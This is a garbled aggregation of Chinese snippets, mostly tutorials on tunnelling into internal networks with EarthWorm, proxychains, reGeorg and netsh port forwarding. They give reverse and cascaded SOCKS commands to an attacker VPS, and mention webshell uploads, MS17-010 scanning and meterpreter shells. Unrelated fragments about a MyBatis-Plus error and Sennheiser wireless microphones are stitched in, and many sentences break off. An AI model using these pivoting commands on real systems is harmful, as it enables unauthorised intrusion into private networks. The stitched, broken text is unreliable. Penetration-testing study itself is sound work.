工具: EW: https://github.com/idlefire/ew proxychains: https://github.com/rofl0r/proxychains-ng 小米随身wifi =/etcmake && make installmake install-config 安装成功后,修改其配置为你的公网ip及端口 vi /etc/proxychains.conf 改为 第三步、EW 反向 socks5 代理 服务器端 chmod +x ew_for_linux64. ,还查了挺久o(╥﹏╥)o 成功连接如图 服务器端 之后就是kali通过proxychains来访问目标机器了 proxychains4 curl 192.168.31.20 可以看到,kali通过代理已经可以访问到目标机器了 nmap扫描 但在本机直接设置代理来访问,会报错socks4不支持 找到了win代理proxifier,在里面设置谷歌浏览器通过该软件代理,就可以访问到内网网站,但是goby代理时总是会失败 [11.20
内网穿透之通过Earthworm(EW)进行隧道穿透 一. 通过Earthworm(EW)进行隧道穿透 在进行多层网段渗透时,我们经常会遇到各种代理隧道问题,仅靠使用端口转发无法完成,可以利用Socks协议建立隧道进行连接,Socks是代理服务可以说是lcx 4.二层反向代理 1)假设当FTP服务器允许出网时,以反向代理为案例,演示二层反向代理如何进行隧道穿透,在FTP服务器执行ew_for_Win.exe -s ssocksd -l 8888"命令 4)然后在Web服务器使用EW工具执行ew_for_Win.exe -s lcx_tran 8888 -f 192.168.52.12 7777命令,去连接FTP服务器的7777端口,转发到Web服务器的 二.本篇总结 随着隧道技术的不断更新迭代,越来越多的攻击者利用隧道技术攻击企业内网,通过本篇文章从Earthworm(EW)隧道工具的利用方式,并且通过大量的案例来演示了多个实际常见的隧道场景,比如我们通过拿到系统权限后利用多个协议实现隧道穿透
在写测试方法的时候 ,发现 bookLambdaQueryWrapper.like(name != null, Book::getName , name); 这一句老是报错
一、前言 前面一次网进行了内网渗透,这里做个人小结,也方便其他小伙伴学习EW。这里仅记录后渗透中与EW相关的部分已提前在tomcat中留下冰蝎马。 ? 二、本文介绍 1.准备工作 2.EW是什么,可以做什么。 3.内网模拟(基础环境及网络拓扑) 4.EW代理实战 6.利用proxychains代理寻找MS17-010。 VPS,端口开放10000-65535 4.若干台WINDOWS虚拟机在NAT网络下运行。 同类工具还有socat,就实战来看,EW操作较简单,SOCAT有时会发生段错误,而EW则比较稳定。 这里用SOCKS5,因为是WIN的主机,还有一个选择--弹到CS,CS代理为SOCKS4。 注意验证SOCKS是否打通 proxychains nmap -sT hosts -p port ?
提出问题:通过ew反向代理后利用proxychains打开了火狐,访问了内网web端口,然后登录处想抓包爆破应该怎么设置这个代理呢? 如果ew流量从1080端口走,bp也设置了1080这样会报端口占用了,如何解决呢? ? 一、实验环境 ? 二、实验工具 Earthworm:下载地址:http://rootkiter.com/EarthWorm/ ? 三、操作步骤 首先模拟提前拿下一台Win7靶机,实战环境可通过蚁剑进行上传EW工具,注意根据实际环境上传对应系统版本的EW文件,实验这里我就直接提前上传EW了。 ? /ew_for_linux64 -s rcsocks -l 1080 -e 8880 该命令是将本地1080端口的流量走向本地8880端口 Win7靶机:ew.exe -s rssocks -d 172.17.60.226
server_port = 7000 auth_token =123 [ssh] type = tcp local_ip = 127.0.0.1 local_port = 22 remote_port = 6000 (4) 4、Natapp 基于ngrok的内网映射工具,免费版本提供http,tcp,udp全隧道穿透、随机域名/随机TCP,UDP端口、不定时强制更换域名/端口和自定义本地端口。 5、Earthworm 内网穿透 EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。 项目地址: http://rootkiter.com/EarthWorm 使用方法: (1)正向 SOCKS v5 服务器,适用于目标网络边界存在公网IP且可任意开监听端口。 . /ew -s lcx_listen -l 1080 -e 8888 $ ./ew -s ssocksd -l 9999 $ .
SOCKS分为SOCKS4和SOCKS5两种类型: SOCKS4只支持TCP协议; SOCKS5不仅支持TCP/UDP协议,还支持各种身份验证机制等,其标准端口为1080。 三、EarthWorm 工具介绍 工具介绍: EarthWorm(EW)是一款便携式的网络工具,具有SOCKS5服务架设和端口转发两大核心功能,可以在复杂的网络环境中实现网络穿透。 EW能够以正向、反向、多级级联等方式建立网络隧道。 EW工具包提供了多个可执行文件,以适用不同的操作系统。 EW的新版本为Termite。 EW隧道通信建立 VPS:访问webshell并上传ew 工具 image.png 配置ew 反向代理监听: ew -s rcsocks -l 1008 -e 888 image.png webshell Goby 使用SOCKS扫描 image.png image.png 4.
EW(Earthworm)是一套便携式的网络穿透工具,具有SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。 下载地址:https://github.com/idlefire/ew 官方网站:http://rootkiter.com/EarthWorm/ EW的指令信息如下所示: -s 选择功能类型: 共包含 配置文件,kali系统默认文件路径为 /etc/proxychains.conf [ProxyList] # add proxy here ... socks5 192.168.1.130 1080 (4) (4)查看,此时获得的主机为linux系统,并在该主机(Host2)上启动socks5代理并监听9999端口: ? 案例4、二级反向代理功能 ?
0x01 前言 上周斗哥给大家介绍了在“百香果”内网安全沙盘中SOCKS的4款工具的基本使用,模拟了在实战情况下Socks工具的使用,掌握在通信隧道中基本的网络结构,本期将继续给大家带来内网通信隧道中 0x02 实战场景 实战环境模拟真实复杂的网络环境,包括ew的多级级联场景和内网服务器限制主动出网场景。 一、EarthWorm 一级级联和二级级联场景 1. 拓扑变更 image.png 2. 场景任务 Z能够通过WEBShell控制A,经过扫描获得B的SSH弱口令,需要通过EW工具的二级级联在Z上访问到C的WEB服务。 4. 任务配置 1> 先配置1级级联 VPS配置:ew -s rcsocks -l 1008 -e 888 image.png A -> webshell:ew -s rssocks -d 66.28.6.110 场景任务 Z能够通过WEBShell控制A,经过扫描获得B的SSH弱口令,需要通过EW工具的二级级联在Z上访问到C的WEB服务。 4.
EW(Earthworm)是一套便携式的网络穿透工具,具有SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。 下载地址:https://github.com/idlefire/ew 官方网站:http://rootkiter.com/EarthWorm/ EW的指令信息如下所示: -s 选择功能类型: 共包含 配置文件,kali系统默认文件路径为 /etc/proxychains.conf [ProxyList] # add proxy here ... socks5 192.168.1.130 1080 (4) (4)查看,此时获得的主机为linux系统,并在该主机(Host2)上启动socks5代理并监听9999端口: ? 案例4、二级反向代理功能 ?
它分socks 4 和socks 5两种类型,socks 4只支持TCP协议而socks 5支持TCP/UDP协议,还支持各种身份验证机制等协议。其标准端口为1080。 EarthWorm 下载链接:https://github.com/rootkiter/EarthWorm https://codeload.github.com/idlefire/ew/zip/master EarthWorm能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。 EarthWorm EW有六种命令格式,分别是ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran。 我们先将ew上传至B主机上面,并用ssocksd方式启动1234端口的正向socks代理: ew_for_Win.exe -s ssocksd -l 1234 接着,将ew上传至A主机中,并执行命令:
官网:http://rootkiter.com/EarthWorm/ github:https://github.com/rootkiter/Binary-files 下载:https://github.com /ew -s rssocks -d 1.1.1.1 -e 8888 (3)多级级联 $ ./ew -s lcx_listen -l 1080 -e 8888 $ . /ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999 lcx_tran 的用法 $ ./ew -s ssocksd -l 9999 $ . /ew -s lcx_listen -l 1080 -e 8888 $ ./ew -s ssocksd -l 9999 $ . Binary-files/tree/bd3223082afbf88421fe391eb55b9eb2da7d533e 使用说明:https://rootkiter.com/Termite/README.txt EarthWorm
内网转发工具的使用 目录 内网转发 reGeorg结合proxychains代理链(HTTP隧道) EW(EarthWorm)结合proxychains代理链 EW正向代理 EW反向代理 Ssocks正向代理 EW(EarthWorm)结合proxychains代理链 EW 是一套便携式的网络穿透工具,具有 SOCKS5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。 不管是linux还是windows系统,Earthworm的包都是一个,如图上面。直接进入包里面,选择对应的程序即可执行 EW正向代理 Web服务器的设置 如果是Linux系统 . 192.168.10.19的80端口做个映射 netsh interface portproxy show all #查看端口映射 netsh interface portproxy delete v4tov4 该服务器的操作 netsh interface portproxy add v4tov4 listenaddress=192.168.10.15 listenport=13389 connectaddress
lcx 2、Netsh 本地端口转发 正向端口转发 3、SSH 二、SOCKS代理类 1、reGeorg reGeorg+Proxifier reGeorg+proxychains 类似工具 2、EarthWorm github.com/SECFORCE/Tunna https://github.com/nccgroup/ABPTTS https://github.com/sensepost/reDuh Part.5 EarthWorm 正向代理 EW 是一套便携式的网络穿透工具,既支持SOCKS5代理转发,又支持静态端口转发。 将EW对应的执行程序上传至外网服务器: ? 外网服务器开启代理: ew.exe -s ssocksd -l 8889 ? 可以直接在浏览器中开启代理: ? //这里使用的是FoxyProxy插件。 首先在攻击机上开启监听: ew.exe -s rcsocks -l 1080 -e 8880 ?
森海塞尔Evolution Wireless Digital: EW-DP森海塞尔推出第五代无线麦克风系统,专为摄像打造韦德马克,2023年4月14日——森海塞尔于NAB推出了其第五代Evolution EW-DP系列EW-DP系列除了可堆叠的EW-DP EK接收器外,该系列还包括一个配领夹麦克风的腰包式发射机(EW-D SK)、一个手持式发射机(EW-D SKM-S)和一个即将于10月推出的直插式发射机 (EW-DP SKP)。 当前上市的套装共有三款,包括:EW-DP ME 2 套装,配有一个腰包式发射机和ME 2全指向形夹式(领夹式)麦克风;EW-DP ME 4套装,配有一个心形指向夹式麦克风,适用于噪音较大的环境;以及EW-DP 最后,EW-DP诞生了,我愿称之为极简UHF系统。”值得一提的是,EW-DP是首款具有磁性堆叠接收机的便携式无线系统,该接收机配有朝向用户的OLED显示屏和符合人体工学的操控设计。
内网隐藏通信隧道技术——EW隧道 EarthWorm中的应用 在研究人员的渗透测试中,EW很好用,体积小,Linux为30kb左右,windows为56kb左右。 /ew -s lcx_listen -l 1080 -e 8888 $ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999 $ . /ew -s ssocksd -l 9999 $ . /ew -s lcx_listen -l 1080 -e 8888 $ ./ew -s ssocksd -l 9999 $ . /ew -s rcsocks -l 1080 -e 8888 $ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999 $ .
它分socks 4 和socks 5两种类型,socks 4只支持TCP协议而socks 5支持TCP/UDP协议,还支持各种身份验证机制等协议。其标准端口为1080。 比较常见的Socks5工具有htran,reGeorg等,socks4的有metasploit。 1.Earthworm 网址:https://github.com/rootkiter/EarthWorm EW 是一套便携式的网络穿透工具,具有 4.二级网络环境(二) 假设我们获得了右侧A主机和B主机的控制权限,A主机没有公网IP,也无法访问内网资源。B主机可以访问内网资源,但无法访问外网。 ? 这个操作分为4步,用到lcx_listen和lcx_slave命令: A. 先上传ew 到左侧公网VPS上,运行下列命令: ew –s lcx_listen –l 10800 –e 888 ?
---- earthworm正向跨平台socks代理 反向代理 一、客户端攻击机吧外网的888端口转发到本地的1008端口: . /ew_for_linux64 -s rcsocks -l 1008 -e 888 ? 二、目标边界接收888端口的数据: ew_for_Win.exe -s rssocks -d 192.168.2.13 -e 888 ? ? 正向代理 目标边界执行: ew_for_Win.exe -s ssocksd ‐l 1080 ? 攻击机服务端修改proxychains文件:192.168.2.13是目标边界的IP ? ---- earthworm正向跨平台socks代理 下载地址:https://github.com/L-codes/Neo-reGeorg 一、生成webshell,密码是123456: python
0x2.1 做跳板 采用ew套接字<socks>代理,服务器上运行准备好的ew_for_linux64,本地使用proxifier配置如下: ? ? 还是使用earthworm进行socks代理,服务端运行后,本机配置如下: ? windows ? kali 配置完成后,用nmap探测一下 ? 0x4 第三层内网渗透 ? ? 这里需要注意,payload要选择正向连接的,不要反弹shell,因为我们访问得到目标而目标访问不到我们。 ? 得到一个meterpreter shell。 ? ew_for_linux64 -s ssocksd -l 8888 ew_for_windows.exe -s ssocksd -l 8888 ew建立ss连接。 原创投稿作者:Railgun作者博客:www.pwn4fun.com
mslookup www.baidu.com vps-ip //linux下的dig dig @vps-ip www.baidu.com 二、网络层隧道技术 1、IPv6隧道 IPv6隧道可以将IPv4作为隧道载体 ,将IPv6报文整体封装在IPv4数据报文中 几种工具: socat 6tunnel nt6tunnel 2、ICMP隧道 在一般的通信协议中,如果两台设备要进行通信,肯定需要开放端口 目前V**隧道协议主要有4种:点到点隧道协议PPTP、第二层隧道协议L2TP、网络层隧道协议IPSec以及SOCKS v5协议。 EarthWorm(ew、新版本Termite)、reGeorg、sSocks、SocksCap64(SSTap)、Proxifier、ProxyChains 六、压缩数据 1、rar.exe 将E:\ ew.txt 将ew.exe转换为ew.txt 然后,利用目标服务器的Debug功能将HEX代码还原为EXE文件 再使用echo命令将ew.txt里面的代码复制到目标系统的命令行环境中 3、其他 还可以用以下这些上传文件